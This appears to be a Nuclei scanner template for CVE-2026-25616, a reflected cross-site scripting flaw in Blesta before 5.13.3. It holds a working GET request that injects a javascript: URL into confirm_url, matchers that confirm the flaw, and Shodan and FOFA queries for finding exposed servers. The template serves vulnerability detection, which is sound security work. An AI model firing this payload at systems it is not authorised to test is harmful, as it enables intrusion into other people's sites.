Description
Blesta 3.x through 5.x before 5.13.3 contains an input validation vulnerability caused by mishandling input, letting attackers potentially exploit the system, exploit requires unspecified conditions.
Blesta 3.x through 5.x before 5.13.3 contains an input validation vulnerability caused by mishandling input, letting attackers potentially exploit the system, exploit requires unspecified conditions.
id: CVE-2026-25616
info:
name: Blesta <= 5.13.1 - Cross-Site Scripting
author: 0x_Akoko
severity: medium
description: |
Blesta 3.x through 5.x before 5.13.3 contains an input validation vulnerability caused by mishandling input, letting attackers potentially exploit the system, exploit requires unspecified conditions.
impact: |
Attackers can exploit input validation flaws to cause unexpected behavior or security issues.
remediation: |
Upgrade to version 5.13.3 or later.
reference:
- https://karmainsecurity.com/KIS-2026-01
- https://www.blesta.com/2026/01/28/security-advisory/
- https://nvd.nist.gov/vuln/detail/CVE-2026-25616
classification:
cve-id: CVE-2026-25616
epss-score: 0.00383
epss-percentile: 0.32104
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
max-request: 1
verified: true
shodan-query: http.title:"Blesta"
fofa-query: app="Blesta"
tags: cve,cve2026,blesta,xss
http:
- raw:
- |
GET /client_dialog/confirm/?confirm_url=javascript:alert(document.domain) HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'action="javascript:alert(document.domain)"'
- '<form method="post"'
condition: and
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402207646080dc45efb077942205890ce9260cb537b118943168420eaee4015d6fb3f022000ef32052b196b77babb837dcee0ecc219c79b4d5c027cdb38017599b2ec3b04:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.